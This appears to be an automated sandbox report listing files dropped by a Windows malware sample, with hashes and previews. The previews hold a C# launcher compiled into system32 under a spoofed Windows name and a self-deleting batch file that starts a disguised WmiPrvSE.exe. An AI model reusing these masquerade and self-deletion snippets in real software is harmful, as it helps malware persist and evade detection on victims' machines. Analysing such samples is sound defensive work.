                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                    C:\Users\user\AppData\Local\Temp\0UFhHJNcKC

                                    Download File
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                    Category:dropped
                                    Size (bytes):114688
                                    Entropy (8bit):0.9746603542602881
                                    Encrypted:false
                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                    Malicious:false
                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\1ffrxwzu\1ffrxwzu.0.cs

                                    Download File
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                    Category:dropped
                                    Size (bytes):405
                                    Entropy (8bit):5.025175847603846
                                    Encrypted:false
                                    SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6LCYgG9VNiFkD:JNVQIbSfhV7TiFkMSfhWLCyVEFkD
                                    MD5:E518811F8D3B3207726EE0A60EA021AE
                                    SHA1:39B44FD057348FC516E74953A8B298096CE5250F
                                    SHA-256:3AA8B92E82D9673B1210E5D1E075B2E7D12E62E6090F14EDBA22CDF0D2AEF01A
                                    SHA-512:165181D92CFEDAC86E69D1ECD9FF8619067377AB6D7DA21505FCE9BDAC97077F4047178BECCC0CA1AF7FADB471A963CCF80F1ED56029718F210848C480A7D880
                                    Malicious:false
                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe"); } catch { } }).Start();. }.}.

                                    C:\Users\user\AppData\Local\Temp\1ffrxwzu\1ffrxwzu.cmdline

                                    Download File
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                    Category:dropped
                                    Size (bytes):251
                                    Entropy (8bit):5.084952486494227
                                    Encrypted:false
                                    SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8oCHhJ23fM61DOMn:Hu7L//TRq79cQD0knn
                                    MD5:661067CBC862045A8EEE7B13AC8146C6
                                    SHA1:04AACE9BD761BAB6F444CBBD0DB79D7C38B91F32
                                    SHA-256:4D4D8074B61B3BC31CFF915877589B1039C68C58DC6B49E1366435820B8D0CE6
                                    SHA-512:962201F53834603994B00B92D4EE8A86CA52EAC5BDFD1C84064C2256D44B3AF2C6945D4205C7347346678214FC4DCC09DFD8B52003EFB0B2D073BC97C6678A58
                                    Malicious:false
                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\1ffrxwzu\1ffrxwzu.0.cs"

                                    C:\Users\user\AppData\Local\Temp\1ffrxwzu\1ffrxwzu.out

                                    Download File
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (322), with CRLF, CR line terminators
                                    Category:modified
                                    Size (bytes):743
                                    Entropy (8bit):5.268539329768409
                                    Encrypted:false
                                    SSDEEP:12:T0I/u7L//TRq79cQD0knuKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AI/un/Vq79tDGKax5DqBVKVrdFAMBJTH
                                    MD5:8A25815B905A5B9106669567BD8B7B8B
                                    SHA1:9991CCDB00D4F5023C9303FB2F053BC7EB678E39
                                    SHA-256:24A0766E92067D675A572DCB0C5E824F1B9590DBF99D91DE107BA214012BF5A6
                                    SHA-512:DF77803672A105054B5B3105E535B32CEE99AE55959F168B20F382CFD64E1687BB5D26663349CF2FAA8CA9FF27A6932AE1CB7894332CB365D94B72BBC67ED9D5
                                    Malicious:false
                                    Preview:.C:\Blockcomcrt> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\1ffrxwzu\1ffrxwzu.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                    C:\Users\user\AppData\Local\Temp\59uCFraLP4

                                    Download File
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):98304
                                    Entropy (8bit):0.08235737944063153
                                    Encrypted:false
                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                    Malicious:false
                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\8GjLo9s3Ra

                                    Download File
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):106496
                                    Entropy (8bit):1.1358696453229276
                                    Encrypted:false
                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                    Malicious:false
                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\KL63VKo306

                                    Download File
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                    Category:dropped
                                    Size (bytes):20480
                                    Entropy (8bit):0.8475592208333753
                                    Encrypted:false
                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOF30AvJ3qj/880C4pwE1:TeAFawNLopFgU10XJBORJ6px4p7
                                    MD5:BE99679A2B018331EACD3A1B680E3757
                                    SHA1:6E6732E173C91B0C3287AB4B161FE3676D33449A
                                    SHA-256:C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
                                    SHA-512:9CFE1932522109D73602A342A15B7326A3E267B77FFF0FC6937B6DD35A054BF4C10ED79D34CA38D56330A5B325E08D8AFC786A8514C59ABB896864698B6DE099
                                    Malicious:false
                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\Ke1wkpQSiR

                                    Download File
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):20480
                                    Entropy (8bit):0.5712781801655107
                                    Encrypted:false
                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                    MD5:05A60B4620923FD5D53B9204391452AF
                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                    Malicious:false
                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\LCUFrCjzFA

                                    Download File
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):106496
                                    Entropy (8bit):1.1358696453229276
                                    Encrypted:false
                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                    Malicious:false
                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\N8x6rZkZOD

                                    Download File
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                    Category:dropped
                                    Size (bytes):51200
                                    Entropy (8bit):0.8746135976761988
                                    Encrypted:false
                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                    Malicious:false
                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\OGRf5Js3co

                                    Download File
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                    Category:dropped
                                    Size (bytes):40960
                                    Entropy (8bit):0.8553638852307782
                                    Encrypted:false
                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                    Malicious:false
                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\QwjUqFq2UZ

                                    Download File
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                    Category:dropped
                                    Size (bytes):40960
                                    Entropy (8bit):0.8553638852307782
                                    Encrypted:false
                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                    Malicious:false
                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\RESA6D0.tmp

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6c8, 10 symbols, created Sun Aug 25 15:02:01 2024, 1st section name ".debug$S"
                                    Category:dropped
                                    Size (bytes):1920
                                    Entropy (8bit):4.602889735783849
                                    Encrypted:false
                                    SSDEEP:24:HGzW91LzWcf2HewKGXN0lmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+2cN:5Lztf2dKGXilmuulB+hnqXSfbNtmhj
                                    MD5:41080BCBB0896482B0A60CB2E1B7666A
                                    SHA1:236A9B4B92E721203E273EAB19D35E6416C190A3
                                    SHA-256:23A9A6C0BE26EE3E031674C3BB8041764806B8588F38B509764A182190905C7B
                                    SHA-512:99594D97FFCD1F0A903D1B1CC653B91A4C2253C38A706695B68EDB6DE3ADDA2776C8C5AA95BFA16578FB19BD8C58D66896DC9FDD17AC0BA4332995894080C71F
                                    Malicious:false
                                    Preview:L...iG.f.............debug$S........P...................@..B.rsrc$01................|...........@..@.rsrc$02........8...................@..@........[....c:\Program Files (x86)\Microsoft\Edge\Application\CSC4F1AC5479EE446D0ADC298BB684B1769.TMP....................q.QK.......N..........5.......C:\Users\user\AppData\Local\Temp\RESA6D0.tmp.-.<....................a..Microsoft (R) CVTRES.V.=..cwd.C:\Blockcomcrt.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................ .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...

                                    C:\Users\user\AppData\Local\Temp\RESA8B5.tmp

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e4, 10 symbols, created Sun Aug 25 15:02:02 2024, 1st section name ".debug$S"
                                    Category:dropped
                                    Size (bytes):1948
                                    Entropy (8bit):4.5515934116534
                                    Encrypted:false
                                    SSDEEP:24:H/G9EoO0FUHdfwKGXN8luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+YEgUZ:h0FUyKGXKluOulajfqXSfbNtmhY2Z
                                    MD5:39BECD09C2D5D65A375BE1114034BAA8
                                    SHA1:3FD20B025BFCBEA47A4D75CF30A22D950CB34031
                                    SHA-256:33AFF56A6F727673A30BA2CE53638F60FB080383BCED21E364703F5D73F1F19A
                                    SHA-512:523670E891DAB70EBBA8FAE7FE2A551665630B0BD8666AC8F2739C15CAB7EB09D31F04380A50AAFE1D52AFECD3643039877C0FA9C6503D0BEBE1498D4FE1F13E
                                    Malicious:false
                                    Preview:L...jG.f.............debug$S........4...................@..B.rsrc$01................`...........@..@.rsrc$02........p...t...............@..@........=....c:\Windows\System32\CSCF64B5552E20A487EA7DE13E15F90A989.TMP.....................r.av..t.y..............5.......C:\Users\user\AppData\Local\Temp\RESA8B5.tmp.-.<....................a..Microsoft (R) CVTRES.V.=..cwd.C:\Blockcomcrt.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................ .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.

                                    C:\Users\user\AppData\Local\Temp\Rim1eTofMH

                                    Download File
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                    Category:dropped
                                    Size (bytes):20480
                                    Entropy (8bit):1.3909341910495931
                                    Encrypted:false
                                    SSDEEP:48:ToyFawNLopFgU10XJBjKwsBjAFMtt/qEM0g9gingQeroAsaC7cUXt9P:cyxe8OwsiFMttSzefroYC7J9P
                                    MD5:1EB30D95ED94CA01369986C3811A0591
                                    SHA1:D7277FF6C5D5F55A4B0576045C2928D7501E7AFC
                                    SHA-256:CA8D4F98E4AD0ED1F66819E90024EB527A7A46DC26D84FB9FF5F1829B6331F46
                                    SHA-512:D5C8BA028977ABA2416D2C02D50FD2535F646003D8F443A01E00C6FC9385F16A6C051502D3947CABF592C619E3E0A22EC586AD57876E517C7B5BB749D396ABA7
                                    Malicious:false
                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\StXJRt58sW

                                    Download File
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):20480
                                    Entropy (8bit):0.5707520969659783
                                    Encrypted:false
                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                    Malicious:false
                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\Vwzr6zAE4u

                                    Download File
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):20480
                                    Entropy (8bit):0.5712781801655107
                                    Encrypted:false
                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                    MD5:05A60B4620923FD5D53B9204391452AF
                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                    Malicious:false
                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\XiWVApSgas

                                    Download File
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                    Category:dropped
                                    Size (bytes):20480
                                    Entropy (8bit):0.6732424250451717
                                    Encrypted:false
                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                    Malicious:false
                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\awpwfmTpaV

                                    Download File
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):25
                                    Entropy (8bit):4.403856189774723
                                    Encrypted:false
                                    SSDEEP:3:rjVQyL/UWAt:n6KPAt
                                    MD5:B0404773A002D899533A202D4C5D124D
                                    SHA1:3262D264CD14DF29AA4D55792B0588BE0BB69C82
                                    SHA-256:3EA34A03BA585BD62494A4BC5E1E45FE98685447B119A55267BD5D5AB8ECF267
                                    SHA-512:90B9A036E68FFCF41FA40EF66121BE5C608E476CFF0956383952EB3448249DFEB68C8C9B636D565A09D42006C2A3FD10FC4455C7C7D3B5ACB06BD0C3E22CFBA8
                                    Malicious:false
                                    Preview:m3Gep5xq9j2HCRnN3Yqs8gfWG

                                    C:\Users\user\AppData\Local\Temp\elmTxMluu5.bat

                                    Download File
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):204
                                    Entropy (8bit):5.108169887214229
                                    Encrypted:false
                                    SSDEEP:6:hCijTg3Nou1SV+DE/P0KOZG1CHhJ23f4Wkhn:HTg9uYDE/TLkhn
                                    MD5:494AA271D7A10F2D3BF45DB4B52E1908
                                    SHA1:D7AFF7C75F42AD39E171A6A985F07025A7A16F17
                                    SHA-256:AC4DD3DA40BCE17D93822B470B16A687073FFC94CCEC5B8FD66DD26EA394E0B5
                                    SHA-512:5DF5BF14E4C8DC5A0705CFEC283E3926C11521FE7CD525F1817A3DAD6E230583E877BF4F8A3BCB4DDC9208FD06A63FE0F2D82914F2A47D7EC3B6AFF082BAA585
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Blockcomcrt\WmiPrvSE.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\elmTxMluu5.bat"

                                    C:\Users\user\AppData\Local\Temp\fueDzTenVF

                                    Download File
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                    Category:dropped
                                    Size (bytes):196608
                                    Entropy (8bit):1.1209886597424439
                                    Encrypted:false
                                    SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                    MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                    SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                    SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                    SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                    Malicious:false
                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\hQ9HYMhUNj

                                    Download File
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):20480
                                    Entropy (8bit):0.5707520969659783
                                    Encrypted:false
                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                    Malicious:false
